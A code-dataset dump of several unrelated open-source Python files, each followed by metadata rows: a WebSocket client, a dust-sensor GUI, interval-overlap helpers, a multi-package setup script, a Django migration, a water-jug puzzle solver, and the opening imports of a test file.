LOGGER = logging.getLogger(__name__)
def wait_for_server_ip():
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.settimeout(30)
# Bind the socket to the port
server_address = ('', 10000)
LOGGER.info('starting up on %s port %s',
server_address[0],
server_address[1])
interface.print_msg("Waiting for a broadcast from the server.")
sock.bind(server_address)
# expects (host, port) as arg, two brackets are on purpose
data = None
try:
LOGGER.info('waiting to receive message')
# TODO: This fails in bash if the port isn't explicitly opened
data, address = sock.recvfrom(4096)
LOGGER.info('received %d bytes from %s', len(data), address)
LOGGER.info(data)
interface.print_msg('Received %s from %s' % (data, address))
if data:
sock.sendto("I'll connect!", address)
finally:
sock.close()
if data and data.split(":")[0] == "sam.ip.broadcast":
ip, port = address[0], int(data.split(":")[1])
LOGGER.info("Used the broadcasted IP.")
interface.print_msg("Used the broadcasted IP.")
else:
ip, port = None, None
LOGGER.info("No broadcast received.")
interface.print_msg("No broadcast received.")
return ip, port
class Interface(WebSocketClientProtocol):
def onConnect(self, response):
LOGGER.info("Server connected: %s", response.peer)
interface.on_connect(response)
def onOpen(self):
LOGGER.info("Connection open.")
# self.sendMessage(u"Hello, world!".encode('utf8'))
# TODO Put some kind of authentication here
interface.on_open(COMMANDS)
def sendInput():
try:
val = COMMANDS.get(timeout=0.1)
except Queue.Empty:
val = None
if val == "exit":
interface.on_exit()
self.sendClose()
elif val is not None:
self.sendMessage(val.encode('utf8'))
interface.message_sent(val)
if val == "exit_server":
interface.on_exit()
self.sendClose()
# TODO: Close when the server closed the connection
if self.state is self.STATE_OPEN:
self.factory.reactor.callLater(0.01, sendInput)
self.factory.reactor.callLater(0.01, sendInput)
def onMessage(self, payload, isBinary):
interface.on_message(payload, isBinary)
if isBinary:
LOGGER.info("Binary message received: %d", len(payload))
else:
LOGGER.info("Text message received: %s", payload.decode('utf8'))
def onClose(self, wasClean, code, reason):
LOGGER.warn("The connection has been ended.")
# self.sendClose()
if reason:
LOGGER.info(reason)
interface.on_close(wasClean, code, reason)
reactor.stop()
if __name__ == '__main__':
# TODO: Establish conection separately.
LOGGER.debug("-"*79)
LOGGER.debug("Starting Interface")
LOGGER.debug("-"*79)
interface.start()
COMMANDS = Queue.PriorityQueue()
factory = WebSocketClientFactory()
factory.protocol = Interface
if "--localhost" in sys.argv or "-L" in sys.argv:
ip, port = "127.0.0.1", 19113
LOGGER.info("Used the local IP as requested per commandline-arg.")
interface.print_msg(
"Used the local IP as requested per commandline-arg.")
else:
ip, port = wait_for_server_ip()
if ip:
reactor.connectTCP(ip, port, factory)
reactor.run()
else:
interface.on_close(False, None, "No Server found.")
|
mit
| -3,016,389,696,744,748,000
| 30.305556
| 76
| 0.600266
| false
| 4.028597
| false
| false
| false
|
jithinbp/SEELablet-apps
|
seel_res/GUI/E_MISCELLANEOUS/A_Add-ons/DUST_SENSOR.py
|
1
|
4615
|
#!/usr/bin/python
from __future__ import print_function
from SEEL_Apps.utilitiesClass import utilitiesClass
from templates import ui_dsm501 as dsm501
import numpy as np
from PyQt4 import QtGui,QtCore
import sys,time
params = {
'image' : 'DSM501.png',
'helpfile': 'http://www.takingspace.org/make-your-own-aircasting-particle-monitor/',
'name':'Dust Sensor\nDSM501',
'hint':'''
Study the concentration of PM2.5 particles over time using a DSM501/PPD42NS sensor. Connect PIN2 of the sensor to ID1, PIN3 to 5V, PIN5 to GND
'''
}
class AppWindow(QtGui.QMainWindow, dsm501.Ui_MainWindow,utilitiesClass):
def __init__(self, parent=None,**kwargs):
super(AppWindow, self).__init__(parent)
self.setupUi(self)
self.I=kwargs.get('I',None)
self.setWindowTitle(self.I.H.version_string+' : '+params.get('name','').replace('\n',' ') )
self.plot1=self.add2DPlot(self.plot_area)
labelStyle = {'color': 'rgb(255,255,255)', 'font-size': '11pt'}
self.plot1.setLabel('bottom','Time -->', units='S',**labelStyle)
self.plot1.getAxis('left').setLabel('Concentration -->>', color='#ffffff')
self.plot1.setLimits(xMin=0,yMin=0)
self.total_samples = 100
self.acquired_samples = 0
self.timegap = 10 #mS
self.sampling_time = 2000 #mS
self.timer2 = QtCore.QTimer()
self.timer2.timeout.connect(self.updateProgress)
self.timer2.start(500)
self.I.set_state(SQR1=True)
self.curve = self.addCurve(self.plot1,'Concentration')
self.resultsTable.setRowCount(self.total_samples)
self.resultsTable.setColumnCount(3)
self.resultsTable.setHorizontalHeaderLabels(['time','Occupancy %','Concentration mg/m^3'])
self.running=False
self.start_time = time.time()
self.samplingStartTime=time.time()
self.timer = self.newTimer()
#self.running=True
#self.timer.singleShot(0,self.run)
self.X=[]
self.Y=[]
def start(self):
self.X=[]
self.Y=[]
self.running = True
self.timer.singleShot(0,self.run)
def stop(self):
self.running=False
def updateProgress(self):
if not self.running:return
val = 1e5*(time.time()-self.samplingStartTime)/(self.sampling_time)
self.timeProgressBar.setValue(val)
def run(self):
if not self.running:return
self.samplingStartTime = time.time()
self.sampling_time = self.integrationBox.value()*1e3 #convert to mS
self.I.start_one_channel_LA(channel='ID1',channel_mode=1,trigger_mode=0) #every edge
if self.running: self.timer.singleShot(self.sampling_time,self.plotData)
def plotData(self):
if not self.running:return
a,b,c,d,e = self.I.get_LA_initial_states()
if a==self.I.MAX_SAMPLES/4: a = 0
tmp = self.I.fetch_long_data_from_LA(a,1)
print (a,b,c,d,e,tmp)
self.I.dchans[0].load_data(e,tmp)
#print (self.I.dchans[0].timestamps,self.I.dchans[0].initial_state)
stamps = self.I.dchans[0].timestamps
if len(stamps)>2:
if not self.I.dchans[0].initial_state:
stamps = stamps[1:] - stamps[0]
diff = np.diff(stamps)
lows = diff[::2]
highs = diff[1::2]
#print(stamps,sum(lows),sum(highs))
low_occupancy = 100*sum(lows)/stamps[-1] #Occupancy ratio
self.progressBar.setValue(low_occupancy)
concentration = 1.1*pow(low_occupancy,3)-3.8*pow(low_occupancy,2)+520*low_occupancy+0.62; #From the spec sheet curve
self.X.append(time.time()-self.start_time)
self.Y.append(concentration)
self.curve.setData(self.X,self.Y)
item = QtGui.QTableWidgetItem();item.setText('%s'%(time.strftime("%H:%M:%S %d-%h")));self.resultsTable.setItem(self.acquired_samples, 0, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
item = QtGui.QTableWidgetItem();item.setText('%.3f'%(low_occupancy));self.resultsTable.setItem(self.acquired_samples, 1, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
item = QtGui.QTableWidgetItem();item.setText('%.3f'%(concentration));self.resultsTable.setItem(self.acquired_samples, 2, item);#item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsEnabled)
self.acquired_samples +=1
if self.acquired_samples==self.total_samples:
self.total_samples = self.acquired_samples+10
self.resultsTable.setRowCount(self.total_samples)
if self.running: self.timer.singleShot(self.timegap,self.run)
def saveData(self):
self.saveDataWindow([self.curve],self.plot1)
def closeEvent(self, event):
self.timer.stop()
self.finished=True
self.running = False
def __del__(self):
self.timer.stop()
print ('bye')
if __name__ == "__main__":
from SEEL import interface
app = QtGui.QApplication(sys.argv)
myapp = AppWindow(I=interface.connect())
myapp.show()
sys.exit(app.exec_())
|
gpl-3.0
| -4,322,714,388,244,980,700
| 34.5
| 212
| 0.711376
| false
| 2.75358
| false
| false
| false
|
bjtrost/TCAG-WGS-CNV-workflow
|
functions.py
|
1
|
5027
|
##########
#sort
def sort_list(x,y):
return cmp(x,y)
##########
#code to calculate reciprocal overlap
def reciprocal_overlap(s_1,e_1,s_2,e_2):
if s_2 > e_1 or s_1 > e_2:
return [0,0]
else:
#get the smaller start
if s_2 >=s_1:
o_start = s_2
else:
o_start = s_1
#get the smaller end
if e_2 >= e_1:
o_end = e_1
else:
o_end = e_2
#calculate length of call and length of overlap
s1_len = e_1 - s_1
s2_len = e_2 - s_2
o_len = o_end - o_start
if 100 * o_len / (s1_len * 1.0) < 0 or 100 * o_len / (s2_len * 1.0) < 0:
print "s_1: ", s_1, "e_1: ",e_1, "s_2:", s_2, "e_2:", e_2, "o_start:", o_start, "o_end:", o_end
print "s1_len: ", s1_len, "s2_len: ", s2_len, " o_len: ", o_len, "% s1 length overlap: ", 100 * o_len / (s1_len * 1.0), "% s2 length overlap: ", 100 * o_len / (s2_len * 1.0)
sys.exit(0)
#return the percent overlap
return [100 * o_len / (s1_len * 1.0),100 * o_len / (s2_len * 1.0)]
##########
#merge overlappping regions into cluster, note that the start and end of the cluster are trimmed
def cluster(o_data,c_data,ref_start,ref_end):
START = 0
END = 0
clusterString = ""
#for all regions
for data in o_data:
start = data[0]
end = data[1]
region = `start`+"-"+`end`+","
if START == 0 and END == 0:
START = start
END = end
clusterString += region
continue
elif start <= END:
clusterString += region
#now we have a new cluster end
if end > END:
END = end
#region doesn't overlap with the cluster
else:
if START < ref_start:
START = ref_start
if END > ref_end:
END = ref_end
c_data.append([START,END])
#start new cluster
clusterString = region
START = start
END = end
#the last cluster details
if clusterString != "":
if START < ref_start:
START = ref_start
if END > ref_end:
END = ref_end
c_data.append([START,END])
##########
#merge overlappping regions into cluster, no start and end cluster trimming
def alt_cluster(o_data,c_data):
START = 0
END = 0
clusterString = ""
#for all regions
for data in o_data:
start = data[0]
end = data[1]
region = `start`+"-"+`end`+","
if START == 0 and END == 0:
START = start
END = end
clusterString += region
continue
elif start <= END:
clusterString += region
#now we have a new cluster end
if end > END:
END = end
#region doesn't overlap with the cluster
else:
c_data.append([START,END])
#start new cluster
clusterString = region
START = start
END = end
#the last cluster details
if clusterString != "":
c_data.append([START,END])
##########
#code to calculate overlap
def overlap(s_1,e_1,s_2,e_2):
if s_2 > e_1 or s_1 > e_2:
return [0,0]
else:
#get the smaller start
if s_2 >=s_1:
o_start = s_2
else:
o_start = s_1
#get the smaller end
if e_2 >= e_1:
o_end = e_1
else:
o_end = e_2
#calculate length of call and length of overlap
s1_len = e_1 - s_1
s2_len = e_2 - s_2
o_len = o_end - o_start
if 100 * o_len / (s1_len * 1.0) < 0 or 100 * o_len / (s2_len * 1.0) < 0:
print "s_1: ", s_1, "e_1: ",e_1, "s_2:", s_2, "e_2:", e_2, "o_start:", o_start, "o_end:", o_end
print "s1_len: ", s1_len, "s2_len: ", s2_len, " o_len: ", o_len, "% s1 length overlap: ", 100 * o_len / (s1_len * 1.0), "% s2 length overlap: ", 100 * o_len / (s2_len * 1.0)
sys.exit(0)
#return the percent boundary
return [o_start,o_end]
##########
#find overlap between list of intervals and the region
def find_overlap(intervals,start,end):
boundaries = []
c_boundaries = []
for i in intervals:
ovlp = overlap(i[0],i[1],start,end)
if ovlp == [0,0]:
continue
else:
boundaries.append(ovlp)
boundaries.sort(sort_list)
cluster(boundaries,c_boundaries,start,end)
covered = 0
for c in c_boundaries:
covered += c[1]-c[0]+1
return (covered/((end-start+1)*1.0))*100
##########
#find overlap between list of calls and the region
def find_overlap_calls(calls,start,end):
boundaries = []
c_boundaries = []
for i in calls:
ovlp = overlap(i.get_start(),i.get_end(),start,end)
if ovlp == [0,0]:
continue
else:
boundaries.append(ovlp)
boundaries.sort(sort_list)
cluster(boundaries,c_boundaries,start,end)
covered = 0
for c in c_boundaries:
covered += c[1]-c[0]+1
return (covered/((end-start+1)*1.0))*100
|
mit
| -8,482,681,232,780,927,000
| 27.089385
| 179
| 0.509051
| false
| 3.072738
| false
| false
| false
|
kdart/pycopia
|
setup.py
|
1
|
8604
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
DOC = """
Master builder (custom script).
This top-level setup script helps with dealing with all sub-packages at
once. It also provides an installer for a simplify setting up developer mode.
Invoke it like a standard setup.py script. However, Any names after the
operation name are taken as sub-package names that are operated on. If no
names are given then all packages are operated on.
Commands:
list -- List available subpackages. These are the names you may
optionally supply.
publish -- Put source distribution on pypi.
build -- Run setuptools build phase on named sub-packages
(or all of them).
install -- Run setuptools install phase.
install_scripts -- Only install scripts (files in bin) with a direct copy.
eggs -- Build distributable egg package.
rpms -- Build RPMs on platforms that support building RPMs.
msis -- Build Microsoft .msi on Windows.
wininst -- Build .exe installer on Windows.
develop -- Developer mode, as defined by setuptools.
develophome -- Developer mode, installing .pth and script files in
user directory.
clean -- Run setuptools clean phase.
squash -- Squash (flatten) all named sub-packages into single tree
in $PYCOPIA_SQUASH, or user site-directory if no
$PYCOPIA_SQUASH defined. This also removes the setuptools
runtime dependency.
Most regular setuptools commands also work. They are passed through by
default.
NOTE: The install operation requires that the sudo command be configured for
you.
"""
import sys
import os
import site
try:
import setuptools
except ImportError:
print("Pycopia requires the package named 'setuptools' to be installed.", file=sys.stderr)
try:
WEXITSTATUS = os.WEXITSTATUS
except AttributeError: # running on Windows
def WEXITSTATUS(arg):
return arg
os.environ["HOME"] = os.environ["USERPROFILE"]
RSYNCCHECK = "rsync --version >nul"
SCRIPT_DIR = os.path.join(sys.prefix, "Scripts")
else:
RSYNCCHECK = "rsync --version >/dev/null"
SCRIPT_DIR = "/usr/local/bin"
# sub-packages are listed in dependency order. A subpackage may import modules
# from other subpackages that appear earlier in this list, but not later.
PACKAGES = [
"aid",
"utils",
"core",
"CLI",
"debugger",
"process",
"net",
"SMI",
"mibs",
"SNMP",
"storage",
"audio",
"XML",
"WWW",
"QA",
"vim",
"doc",
"fepy",
]
# Where to put "squashed", or flattened target where all subpackages are
# installed into one directory, and removing "package namespace" support.
PYCOPIA_SQUASH = os.environ.get("PYCOPIA_SQUASH", site.USER_SITE)
# Where top-level scripts will be installed to when install_scripts command is used.
PYCOPIA_BIN = os.environ.get("PYCOPIA_BIN", os.path.join(os.path.expandvars("$HOME"), "bin"))
def _do_commands(name, cmds, root):
# use sudo on Linux and possibly other platforms. On Windows it's
# assumed you're running as Administrator (everybody does it...)
if root and sys.platform not in ("win32", "cli"):
sudo = "sudo "
else:
sudo = ""
cmd = "%s%s setup.py %s" % (sudo, sys.executable, " ".join(cmds))
print("========", name, "==", cmd)
rv = False
os.chdir(name)
try:
rv = WEXITSTATUS(os.system(cmd)) == 0
finally:
os.chdir("..")
print("====================== END", name, "\n")
return rv
def do_eggs(name):
return _do_commands(name, ["bdist_egg"], False)
def do_rpms(name):
return _do_commands(name, ["bdist_rpm", "--python", sys.executable], False)
def do_msis(name):
return _do_commands(name, ["bdist_msi"], False)
def do_wininst(name):
return _do_commands(name, ["bdist_wininst"], False)
# "scripts", those files in bin/, may require some special interpreter
# flags, such as -S, This prevents setuptools from functioning.
# Since Pycopia scripts are written generically there is not reason not to
# install them as-is.
# only works on Linux for now.
def _do_scripts(name, scriptdir, root=False):
if root and sys.platform not in ("win32", "cli"):
sudo = "sudo "
else:
sudo = ""
os.chdir(name)
rv = True
try:
if os.path.isdir("bin"):
if sys.platform == "darwin":
cmd = "%scp -a bin/* %s" % (sudo, scriptdir)
else:
cmd = "%scp -dR --preserve=mode bin/* %s" % (sudo, scriptdir)
print("======== SCRIPTS", name, "==", cmd)
rv = WEXITSTATUS(os.system(cmd)) == 0
finally:
os.chdir("..")
print("====================== END SCRIPTS", name)
return rv
def do_install_scripts(name):
return _do_scripts(name, PYCOPIA_BIN)
def do_develophome(name):
if not os.path.isdir(site.USER_SITE):
os.makedirs(site.USER_SITE)
rv = _do_commands(name, ["develop", "--install-dir", site.USER_SITE, "--script-dir", PYCOPIA_BIN, "-l -N"], False)
rvs = _do_scripts(name, PYCOPIA_BIN)
return rv and rvs
def do_develop(name):
rv = _do_commands(name, ["develop", "--script-dir", PYCOPIA_BIN, "-l -N"], False)
rvs = _do_scripts(name, PYCOPIA_BIN)
return rv and rvs
def do_publish(name):
return _do_commands(name, ['egg_info -RDb ""', "sdist", "register", "upload"], False)
def do_egg_info(name):
return _do_commands(name, ['egg_info'], False)
def do_install(name):
rv1 = _do_commands(name, ["install -O2", "--install-scripts", SCRIPT_DIR], True)
# Don't use the setuptools script wrapper for Pycopia scripts. This
# will overwrite the installed scripts with a direct copy.
rv2 = _do_scripts(name, SCRIPT_DIR, True)
return rv1 and rv2
def do_clean(name):
return _do_commands(name, ["clean"], False)
def do_list(name):
print(name, end=" ")
return True
# "squash" selected sub packages to a single package. Also removes
# setuptools dependency when tarballed.
def do_squash(name):
if not _check_rsync():
print("Squash requires rsync tool to be installed.")
return False
if not os.path.isdir(PYCOPIA_SQUASH):
os.makedirs(PYCOPIA_SQUASH)
os.chdir(name)
uname = os.uname()
bin_dir = os.path.join("build", "lib.%s-%s-%s" % (uname[0].lower(), uname[4], sys.version[:3]))
# e.g: build/lib.linux-x86_64-2.5/pycopia
print("======== SQUASH", name, "to", PYCOPIA_SQUASH)
try:
if WEXITSTATUS(os.system("%s setup.py build" % (sys.executable,))) != 0:
return False
for pydir in ("build/lib", bin_dir):
if os.path.isdir(pydir):
cmd = "rsync -azvu %s/ %s" % (pydir, PYCOPIA_SQUASH)
if WEXITSTATUS(os.system(cmd)) != 0:
return False
finally:
os.chdir("..")
_null_init(PYCOPIA_SQUASH)
print("====================== END", name, "squashed into", PYCOPIA_SQUASH, "\n")
return True
def _null_init(directory):
open(os.path.join(directory, "pycopia", "__init__.py"), "w").close()
def _check_rsync():
return WEXITSTATUS(os.system(RSYNCCHECK)) == 0
def do_generic(name):
pass
def get_svn_revision():
import subprocess
from xml.etree import ElementTree
info = ElementTree.fromstring(subprocess.check_output("svn info --xml".split()))
rev = info.find("entry").attrib["revision"]
return int(rev)
def main(argv):
try:
cmd = argv[1]
except IndexError:
print(DOC)
return 1
# mainrev = get_svn_revision()
# os.environ["PYCOPIA_REVISION"] = str(mainrev)
try:
method = globals()["do_" + cmd]
except KeyError:
def method(name):
return _do_commands(name, [cmd], False)
for name in (argv[2:] or PACKAGES):
if not method(name):
break
print()
return 0
sys.exit(main(sys.argv))
|
apache-2.0
| -4,479,907,580,095,837,000
| 31.714829
| 118
| 0.630288
| false
| 3.483401
| false
| false
| false
|
sa2ajj/DistroTracker
|
pts/mail/migrations/0001_initial.py
|
1
|
7292
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CommandConfirmation'
db.create_table(u'mail_commandconfirmation', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('confirmation_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40)),
('date_created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('commands', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'mail', ['CommandConfirmation'])
# Adding model 'BounceStats'
db.create_table(u'mail_bouncestats', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('email_user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.EmailUser'])),
('mails_sent', self.gf('django.db.models.fields.IntegerField')(default=0)),
('mails_bounced', self.gf('django.db.models.fields.IntegerField')(default=0)),
('date', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'mail', ['BounceStats'])
# Adding unique constraint on 'BounceStats', fields ['email_user', 'date']
db.create_unique(u'mail_bouncestats', ['email_user_id', 'date'])
def backwards(self, orm):
# Removing unique constraint on 'BounceStats', fields ['email_user', 'date']
db.delete_unique(u'mail_bouncestats', ['email_user_id', 'date'])
# Deleting model 'CommandConfirmation'
db.delete_table(u'mail_commandconfirmation')
# Deleting model 'BounceStats'
db.delete_table(u'mail_bouncestats')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.emailuser': {
'Meta': {'object_name': 'EmailUser'},
'default_keywords': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Keyword']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_email': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['django_email_accounts.UserEmail']", 'unique': 'True'})
},
u'core.keyword': {
'Meta': {'object_name': 'Keyword'},
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'django_email_accounts.user': {
'Meta': {'object_name': 'User'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'main_email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'django_email_accounts.useremail': {
'Meta': {'object_name': 'UserEmail'},
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '244'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'null': 'True', 'to': u"orm['django_email_accounts.User']"})
},
u'mail.bouncestats': {
'Meta': {'ordering': "[u'-date']", 'unique_together': "((u'email_user', u'date'),)", 'object_name': 'BounceStats'},
'date': ('django.db.models.fields.DateField', [], {}),
'email_user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.EmailUser']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mails_bounced': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'mails_sent': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'mail.commandconfirmation': {
'Meta': {'object_name': 'CommandConfirmation'},
'commands': ('django.db.models.fields.TextField', [], {}),
'confirmation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['mail']
|
gpl-2.0
| 8,308,571,386,329,360,000
| 62.417391
| 187
| 0.566786
| false
| 3.642358
| false
| false
| false
|
jamescooke/water-pouring-python
|
water/game.py
|
1
|
7431
|
import copy
from functools import reduce
from .cup import Cup
or_reduction = lambda x, y: x or y
and_reduction = lambda x, y: x and y
class Game(object):
cups = None
parent = None # Game that created this one
children = None
def __init__(self, sizes=None, parent=None):
"""
Set up a game with cups.
Improvements
* Just pass Cups instead of int configs for Cups
* Put default cup config somewhere other than init
>>> g = Game()
>>> len(g.cups)
3
>>> g.parent is None
True
>>> g.children
[]
>>> h = Game(sizes=[(5, 5), (5, 0)], parent=g)
>>> len(h.cups)
2
>>> h.parent is g
True
"""
self.cups = []
if sizes is None:
# Set up cups with default sizes
sizes = [(3, 0), (5, 0), (8, 8)]
for cap, cont in sizes:
self.cups.append(Cup(cap=cap, cont=cont))
# Save a pointer to the parent
self.parent = parent
# Children starts empty
self.children = []
def is_goal(self):
"""
There is a Cup in the Game that has the goal conditions.
>>> g = Game(sizes=[(4, 4)])
>>> g.is_goal()
True
>>> h = Game()
>>> h.is_goal()
False
"""
return reduce(
or_reduction,
[cup.is_goal() for cup in self.cups]
)
def __eq__(self, g):
"""
Games have same number of Cups and all Cups are equal.
:pre: Game has at least one cup.
>>> g = Game(sizes=[(3, 0), (5, 5)])
1. Less or more games, even if equal, is not equal.
>>> g == Game(sizes=[(3, 0)])
False
>>> g == Game(sizes=[(3, 0), (5, 5), (1, 1)])
False
2. Same num of cups means checking cups.
>>> g == Game(sizes=[(3, 1), (5, 4)])
False
3. Equal is equal.
>>> g == Game(sizes=[(3, 0), (5, 5)])
True
"""
return (
len(self.cups) == len(g.cups)
and reduce(
and_reduction,
[cup == g.cups[pos] for pos, cup in enumerate(self.cups)]
)
)
def net_has_game(self, g):
"""
Game's network of games contains this game.
"""
return self.top_parent().has_game(g)
def top_parent(self):
"""
Returns the top parent for a game, the parent state that has no parent.
"""
return self if self.parent is None else self.parent.top_parent()
def has_game(self, g):
"""
Passed Game ``g`` is in this Game's tree of Games
>>> from unittest.mock import Mock
>>> g = Game(sizes=[(3, 0), (5, 5)])
1. If the game being seached for matches, then True
>>> g.has_game(Game(sizes=[(3, 0), (5, 5)]))
True
2. If game does not match and no child games, False
>>> g.has_game(Game(sizes=[(4, 0), (5, 5)]))
False
3. If game being search for does not match, sub games are searched
>>> s_a = Mock(name='sub Game A')
>>> s_a.has_game.return_value = False
>>> s_b = Mock(name='sub Game B')
>>> s_b.has_game.return_value = True
>>> g.children.append(s_a)
>>> g.children.append(s_b)
>>> g.has_game(Game(sizes=[(4, 0), (5, 5)]))
True
"""
return (
self == g
or (
len(self.children) > 0
and reduce(
or_reduction,
[game.has_game(g) for game in self.children]
)
)
)
def make_game(self, c_a, c_b):
"""
Create a new game state by pouring Cup at ``c_a`` into Cup at ``c_b``.
New game will have its parent set as this Game.
1. Does not care if the pour is a 'good pour', just returns the new
game. If there are no contents to pour, or no space in the
destination, then the new game will be in the same state and will
be removed by the de-duplication search.
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> h = g.make_game(0, 1)
>>> g == h
True
>>> h.parent is g
True
2. When the pour is good, then the cups' states are adjusted
accordingly. Original parent Game's cups stay the same.
>>> g = Game(sizes=[(3, 3), (5, 5), (8, 0)])
>>> h = g.make_game(0, 2)
>>> expected = Game(sizes=[(3, 0), (5, 5), (8, 3)])
>>> h == expected
True
>>> h.parent is g
True
>>> g.cups[0].contents
3
"""
new_game = copy.deepcopy(self)
new_game.parent = self
(new_game.cups[c_a],
new_game.cups[c_b]) = new_game.cups[c_a].pour_into(new_game.cups[c_b])
return new_game
def make_children(self):
"""
Do all the pours, check that new Games don't exist in the network and
for those that are new add them to this Game's children.
1. If there's just one cup, does nothing
>>> g = Game(sizes=[(4, 4)])
>>> g.make_children()
0
>>> g.children
[]
2. If a pour option creates a Game that's already in the network then
it's not added to the children.
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> g.make_children()
1
>>> expected = Game(sizes=[(3, 3), (5, 2)])
>>> g.children[0] == expected
True
3. If the Game generated by pouring is already in the network, then no
new games are generated. In this example, the only option from Game
g is to pour the 5 cup into the 3 cup, but this is the same state
as the parent h, so is ignored.
>>> h = Game(sizes=[(3, 3), (5, 2)])
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> h.children = [g]
>>> g.parent = h
>>> g.make_children()
0
"""
for c_a in range(len(self.cups)):
for c_b in range(len(self.cups)):
if c_b == c_a:
continue
new_game = self.make_game(c_a, c_b)
if not self.net_has_game(new_game):
self.children.append(new_game)
return len(self.children)
def is_solvable(self):
"""
Main function. Could be written as a one line boolean, but keeping it
like this for readability. See unittests for coverage.
"""
if self.is_goal():
self.print_trace()
return True
if self.make_children() == 0:
return False
return self.solvable_child()
def solvable_child(self):
"""
Recursively walks list of Game's children looking for a solvable one.
Wishing python was haskell ._. See unittests for coverage.
"""
for child in self.children:
if child.is_solvable():
return True
return False
def print_trace(self):
"""
Run up the stack of Games printing each one so that a history can be
outputted when success is found. See unittests for coverage.
"""
if self.parent is not None:
self.parent.print_trace()
print(self.cups)
|
gpl-2.0
| -2,943,814,514,436,023,000
| 28.027344
| 79
| 0.491724
| false
| 3.730422
| false
| false
| false
|
openpassword/blimey
|
tests/integration/openpassword/agile_keychain/test_item_manager.py
|
1
|
4311
|
import os
import shutil
import time
import json
from nose.tools import raises
from blimey.agile_keychain._manager._item_manager import ItemManager
